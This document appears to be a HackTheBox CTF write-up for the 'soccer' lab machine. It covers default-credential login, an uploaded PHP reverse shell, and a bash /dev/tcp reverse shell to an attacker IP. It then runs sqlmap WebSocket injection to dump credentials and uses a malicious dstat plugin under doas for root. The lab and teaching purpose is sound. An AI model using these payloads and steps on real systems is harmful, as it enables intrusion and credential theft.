HTB: soccer Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐☆☆☆
• CTF-like: ⭐⭐⭐⭐☆

Summary

soccer is an Easy-difficulty Linux machine that combines web application exploitation with SQL injection and Linux privilege escalation. The attack path involves discovering a file manager with default credentials, uploading a PHP reverse shell, enumerating network services and subdomains, extracting database credentials via WebSocket SQL injection, and finally escalating privileges through a misconfigured doas configuration with the dstat utility.

TL;DR: Recon → Tiny File Manager (admin:admin@123) → PHP reverse shell → WebSocket SQL injection → Database credentials → User SSH → dstat privilege escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.175.142

Results:

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1
80/tcp   open  http       nginx 1.18.0
9091/tcp open  xmltec-xmlmail Node.js app

Service Enumeration

Add the target to your hosts file:

echo "10.129.175.142 soccer.htb" >> /etc/hosts

Enumerate HTTP service with gobuster:

gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Key Finding: Located /tiny endpoint → Tiny File Manager

Accessing http://soccer.htb/tiny/tinyfilemanager.php reveals the Tiny File Manager application. Testing default credentials:

Username: admin
Password: admin@123

Credentials successfully authenticate, granting access to the file upload interface.

Initial Foothold

Exploitation Path

Step 1: Create PHP Reverse Shell

Create shell.php:

<?php
$ip = "10.10.14.X";  // Your attacker IP
$port = 4567;
$sock = fsockopen($ip, $port);
exec("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
?>

Step 2: Upload via Tiny File Manager

1. Log into http://soccer.htb/tiny/tinyfilemanager.php with admin:admin@123
2. Navigate to upload directory
3. Upload shell.php via the web interface
4. Note the file location (typically in /var/www/html/ or subdirectory)

Step 3: Execute via Burp Suite

Set up listener:

nc -nlvp 4567

Intercept HTTP request in Burp and navigate to the uploaded shell. Alternatively, use curl:

curl "http://soccer.htb/path/to/shell.php"

Step 4: Reverse Shell Execution

Once the shell.php is accessed, execute the reverse shell command:

bash -c 'bash -i >& /dev/tcp/10.10.14.X/4567 0>&1'

Result: Obtained shell as www-data user.

www-data@soccer:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Post-Exploitation Enumeration

Upgrade shell to interactive:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Enumerate open ports from within the machine:

ss -tlnp

Additional Services Discovered:

3000/tcp   - HTTP service (likely web app)
3306/tcp   - MySQL
33060/tcp  - MySQL X Protocol
9091/tcp   - Node.js WebSocket service

Examine nginx configuration:

cat /etc/nginx/sites-enabled/default

Key Finding: Discovered subdomain soc-player.soccer.htb configured in nginx. This subdomain hosts a signup/login application with a WebSocket ticket verification feature on port 9091.

Add subdomain to hosts file:

echo "10.129.175.142 soc-player.soccer.htb" >> /etc/hosts

User Compromise

Vulnerability Analysis

The subdomain soc-player.soccer.htb contains a signup/login portal. Upon further investigation, the application implements a ticket checking feature via WebSocket on port 9091.

Vulnerability: Boolean-based blind SQL injection in the WebSocket id parameter.

SQL Injection Exploitation

The WebSocket endpoint accepts JSON data:

{"id":"*"}

This parameter is vulnerable to blind SQL injection. Use sqlmap to exploit:

sqlmap -u 'ws://soc-player.soccer.htb:9091/' \
  --data '{"id":"*"}' \
  --technique=B \
  --risk 3 \
  --level 5 \
  --batch \
  --dbs

Database Enumeration

Dump database names:

sqlmap -u 'ws://soc-player.soccer.htb:9091/' \
  --data '{"id":"*"}' \
  --technique=B \
  --risk 3 \
  --level 5 \
  --batch \
  -D soccer_db \
  --dump

Key Finding: Database soccer_db contains accounts table with credentials:

Username: player
Password: PlayerOftheMatch2022

SSH Access

SSH into the machine as the player user:

ssh player@soccer.htb

When prompted, enter password: PlayerOftheMatch2022

Result: Obtained user-level access.

player@soccer:~$ id
uid=1000(player) gid=1000(player) groups=1000(player)

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

Check sudo privileges:

sudo -l

Output reveals:

User player may run the following commands on soccer:
    (root) NOPASS: /usr/bin/dstat

However, sudo may require a password. Check doas instead:

doas -l

This reveals the same privilege, but doas allows no-password execution:

permit nopass player as root cmd /usr/bin/dstat

Vulnerability Assessment

Check GTFOBins for dstat:

The dstat utility supports custom plugins located in /usr/local/share/dstat/. By creating a malicious plugin and invoking dstat with the --xxx flag, we can execute arbitrary code as root.

Exploitation

Create a malicious dstat plugin:

cat > /usr/local/share/dstat/dstat_xxx.py << 'EOF'
import os
os.execv("/bin/sh", ["sh"])
EOF

Execute dstat with the malicious plugin via doas:

doas /usr/bin/dstat --xxx

Result: Root shell obtained.

# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Port Scanning<br/>nmap -p-"] --> B["Service Enumeration<br/>gobuster /tiny"]
    B --> C["Tiny File Manager<br/>Default Credentials<br/>admin:admin@123"]
    C --> D["Upload PHP<br/>Reverse Shell"]
    D --> E["RCE as www-data<br/>Execute shell.php"]
    E --> F["Enumerate Subdomains<br/>soc-player.soccer.htb"]
    F --> G["WebSocket SQL Injection<br/>sqlmap blind exploitation"]
    G --> H["Extract DB Credentials<br/>player:PlayerOftheMatch2022"]
    H --> I["SSH as player user"]
    I --> J["Enumerate doas Permissions<br/>dstat NOPASS"]
    J --> K["Create Malicious dstat Plugin"]
    K --> L["Execute doas /usr/bin/dstat<br/>--xxx"]
    L --> M["Root Shell Obtained"]

Tools Used

Vulnerability Reference Table

Key Learnings

• Enumeration is Critical: Multiple services and subdomains revealed through thorough port and directory scanning led to multiple attack vectors.
• Default Credentials: Weak default credentials on administrative interfaces (Tiny File Manager) remain a significant vulnerability in production environments.
• Privilege Escalation via Custom Plugins: Tools like dstat that support plugin directories can be exploited if not properly restricted; ensure plugin directories have strict permissions.
• WebSocket Security: WebSocket endpoints are often overlooked but can be vulnerable to the same injection attacks as traditional HTTP requests; tools like sqlmap can target them effectively.
• Database Credential Extraction: SQL injection can directly yield credentials for lateral movement, enabling SSH access to other user accounts.
• doas vs sudo: The doas utility may have different permission models; always check both sudo -l and doas -l when enumerating privilege escalation opportunities.

Vulnerability Reference

• Tiny File Manager: Known for default credentials; always change default passwords in administration interfaces
• PHP File Upload: Unrestricted file uploads combined with web server execution enable remote code execution
• SQL Injection via WebSocket: Web sockets accept the same injection payloads as HTTP; sqlmap supports WebSocket targeting
• GTFOBins - dstat: https://gtfobins.github.io/gtfobins/dstat/

Author

Anonymous

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. Users are responsible for adhering to all applicable laws and regulations in their jurisdiction.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #FileManager #SQLInjection #PrivilegeEscalation